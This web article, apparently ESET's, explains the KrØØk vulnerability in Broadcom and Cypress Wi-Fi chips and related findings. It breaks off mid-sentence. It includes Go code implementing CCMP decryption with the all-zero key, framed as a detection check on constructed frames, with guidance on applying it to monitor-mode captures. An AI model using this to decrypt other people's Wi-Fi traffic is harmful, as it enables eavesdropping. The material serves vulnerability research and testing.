Beyond KrØØk: Even more Wi‑Fi chips vulnerable to eavesdropping

At Black Hat USA 2020, ESET researchers delved into the details of the KrØØk vulnerability in Wi-Fi chips and revealed that similar bugs affect more chip brands than previously thought.



From KrØØk to finding related vulnerabilities


KrØØk (formally CVE-2019-15126) is a vulnerability in Broadcom and Cypress Wi-Fi chips that allows unauthorized decryption of some WPA2-encrypted traffic. Specifically, the bug causes wireless network data to be encrypted with a WPA2 pairwise session key (the temporal key, TK, which CCMP uses to encrypt data frames) that is all zeros, instead of the proper session key previously established in the 4-way handshake. This undesirable state occurs on vulnerable Broadcom and Cypress chips following a Wi-Fi disassociation.



Figure 1. Overview of KrØØk – following a disassociation, data is transmitted encrypted with an all-zero session key



Exploiting KrØØk allows adversaries to intercept and decrypt (potentially sensitive) data of interest and, compared to other techniques commonly used against Wi-Fi, it has a significant advantage: while the attackers need to be in range of the Wi-Fi signal, they do not need to be authenticated and associated to the WLAN. In other words, they don't need to know the Wi-Fi password.
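To make the zero-key state concrete, here is an added example in Go (written for this page; it is not ESET's test code, nor any vendor's firmware) that implements 802.11 CCMP, i.e. AES-CCM with a 13-byte nonce and an 8-byte MIC as specified in IEEE 802.11 and RFC 3610, for a non-QoS three-address data frame, and then performs the check a tester or defender wants: try to decrypt a captured frame with a 16-byte all-zero temporal key and see whether its MIC verifies. Everything in it is constructed: the addresses, packet number and payload are sample data, `Encrypt` stands in for the chip's own encryption so the example runs offline, and `UsesZeroKey` is the check itself. QoS frames (TID in the first nonce byte, QC field in the AAD) and 4-address frames are assumed out of scope.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

const micLen = 8 // CCMP MIC length; the TK is 16 bytes (AES-128)

var ZeroTK = make([]byte, 16) // the all-zero TK a KrØØk-affected chip ends up using after a disassociation

// Frame is what CCMP needs from a captured 802.11 data frame; Body = CCMP header || ciphertext || MIC.
type Frame struct {
	FC, SC     [2]byte
	A1, A2, A3 [6]byte
	Body       []byte
}

// nonce is the 13-byte CCM nonce: priority (0 for non-QoS data) || A2 || PN (big-endian).
func nonce(f *Frame, pn [6]byte) (n [13]byte) {
	copy(n[1:7], f.A2[:])
	copy(n[7:], pn[:])
	return n
}

// aad is the 22-byte MAC header with mutable bits masked: subtype/Retry/PwrMgt/MoreData cleared,
// Protected set, sequence number zeroed (fragment number kept).
func aad(f *Frame) []byte {
	a := []byte{f.FC[0] & 0x8f, (f.FC[1] & 0xc7) | 0x40}
	a = append(append(append(a, f.A1[:]...), f.A2[:]...), f.A3[:]...)
	return append(a, f.SC[0]&0x0f, 0)
}

// ccm is CCM with L=2, M=8 (RFC 3610 as used by 802.11 CCMP): CTR over the data from counter 1,
// plus tag = CBC-MAC(B0 || len(AAD)||AAD || plaintext) XOR E(A_0).
func ccm(blk cipher.Block, n [13]byte, a, in []byte, decrypt bool) (out []byte, tag [micLen]byte) {
	ctr := [16]byte{0: 0x01, 15: 1} // A_1 = flags (L'=1) || nonce || counter (2-byte big-endian)
	copy(ctr[1:14], n[:])
	out = make([]byte, len(in))
	cipher.NewCTR(blk, ctr[:]).XORKeyStream(out, in) // increments the 2-byte counter exactly as CCM does
	plain := in
	if decrypt {
		plain = out
	}
	var x, s0 [16]byte
	absorb := func(b []byte) { // CBC-MAC over b, zero-padded to whole blocks
		for i := 0; i < len(b); i += 16 {
			for j := 0; j < 16 && i+j < len(b); j++ {
				x[j] ^= b[i+j]
			}
			blk.Encrypt(x[:], x[:])
		}
	}
	absorb(append(append([]byte{0x59}, n[:]...), byte(len(plain)>>8), byte(len(plain)))) // B0: Adata=1, M'=3, L'=1
	absorb(append([]byte{byte(len(a) >> 8), byte(len(a))}, a...))
	absorb(plain)
	ctr[15] = 0 // S_0 = E(A_0) masks the tag
	blk.Encrypt(s0[:], ctr[:])
	for j := range tag {
		tag[j] = x[j] ^ s0[j]
	}
	return out, tag
}

// Encrypt stands in for the chip: it protects plain under tk and fills f.Body.
// A KrØØk-affected chip effectively does this with ZeroTK after a disassociation.
func Encrypt(tk []byte, f *Frame, pn [6]byte, plain []byte) {
	blk, err := aes.NewCipher(tk)
	if err != nil {
		panic(err) // a chip always holds a 16-byte TK; a bad length is a caller bug
	}
	hdr := []byte{pn[5], pn[4], 0, 0x20, pn[3], pn[2], pn[1], pn[0]} // PN0 PN1 rsvd KeyID0|ExtIV PN2..PN5
	ct, tag := ccm(blk, nonce(f, pn), aad(f), plain, false)
	f.Body = append(append(hdr, ct...), tag[:]...)
}

// Decrypt tries tk on a captured frame and reports whether its MIC verifies.
func Decrypt(tk []byte, f *Frame) ([]byte, bool) {
	b := f.Body
	blk, err := aes.NewCipher(tk)
	if err != nil || len(b) < 8+micLen {
		return nil, false
	}
	n := nonce(f, [6]byte{b[7], b[6], b[5], b[4], b[1], b[0]}) // PN5..PN0 from the CCMP header
	plain, tag := ccm(blk, n, aad(f), b[8:len(b)-micLen], true)
	if !bytes.Equal(tag[:], b[len(b)-micLen:]) {
		return nil, false
	}
	return plain, true
}

// UsesZeroKey is the KrØØk check: a frame whose MIC verifies under the all-zero TK was encrypted
// with the zero key and is readable by anyone in range, no PSK required.
func UsesZeroKey(f *Frame) bool { _, ok := Decrypt(ZeroTK, f); return ok }

var SamplePayload = []byte("\xaa\xaa\x03\x00\x00\x00\x08\x00constructed sample payload") // constructed, not a capture

// SampleFrame builds a constructed non-QoS, To-DS data frame (PN=1) encrypted under tk.
func SampleFrame(tk []byte) *Frame {
	f := &Frame{FC: [2]byte{0x08, 0x41}, SC: [2]byte{0x10, 0}, // Data, ToDS+Protected; seq 1
		A1: [6]byte{2, 0, 0, 0, 0, 1}, A2: [6]byte{2, 0, 0, 0, 0, 2}, A3: [6]byte{2, 0, 0, 0, 0, 3}}
	Encrypt(tk, f, [6]byte{0, 0, 0, 0, 0, 1}, SamplePayload)
	return f
}

func main() {
	fmt.Println("affected-chip frame verifies under zero TK:", UsesZeroKey(SampleFrame(ZeroTK)))
}
```

In a real test the `Frame` fields come from monitor-mode captures of the client under test after it has been disassociated, and `Decrypt(ZeroTK, f)` is run on every CCMP-protected data frame it sends; a single verified MIC means the chip is transmitting under the zero key, which is exactly the condition in Figure 1, and it is established without any knowledge of the network's PSK. The MIC check is what makes this a reliable indicator rather than a guess: under any other key the decrypted plaintext fails the 64-bit tag, so a healthy client produces no false positives.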


We worked with the affected vendors (as well as ICASI) through a responsible disclosure process before we first publicly disclosed the flaw at the RSA Conference in February 2020. The ensuing publicity brought the issue to the attention of many more chipset and device manufactu ..
